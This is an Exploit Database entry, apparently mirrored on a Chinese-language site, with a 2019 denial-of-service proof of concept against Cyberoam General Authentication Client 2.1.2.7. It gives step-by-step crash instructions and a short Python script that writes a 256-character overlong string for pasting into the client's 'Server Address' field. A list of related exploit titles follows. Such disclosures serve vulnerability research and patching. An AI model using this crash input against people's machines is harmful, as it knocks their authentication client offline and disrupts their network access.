Cyberoam General Authentication Client 2.1.2.7 – ‘Server Address’ Denial of Service (PoC)

Exploit Database
88 阅读

作者： Victor Mondragón

日期： 2019-05-24
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46927/

#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip
#Tested Version: 2.1.2.7
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: cgac_2.1.2.7.py
#2.- Open cgac_2.1.2.7.txt and copy content to clipboard
#3.- Open Cyberoam General Authentication Client
#4.- In "Server Address" field paste Clipboard
#5.- Click on "Test"
#6.- Crashed! 

cod = "\x41" * 256

f = open('cgac_2.1.2.7.txt', 'w')
f.write(cod)
f.close()

last Exploits
Cyberoam General Authentication Client 2.1.2.7 – ‘Server Address’ Denial of Service (PoC)的更多信息

Apple Mac OSX Regex Engine (TRE) – Integer Signedness / Overflow：
Edraw Diagram Component 5 – ActiveX Control ‘LicenseName()’ Method Buffer Overflow：
Linux – Use-After-Free via race Between modify_ldt() and #BR Exception：
ObserverIP Scan Tool 1.4.0.1 – Denial of Service (PoC)：
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service：
Mongoose 2.11 – ‘Content-Length’ HTTP Header Remote Denial of Service：
Linux – ‘kvm_ioctl_create_device()’ NULL Pointer Dereference：
yTree 1.94-1.1 – Local Buffer Overflow (PoC)：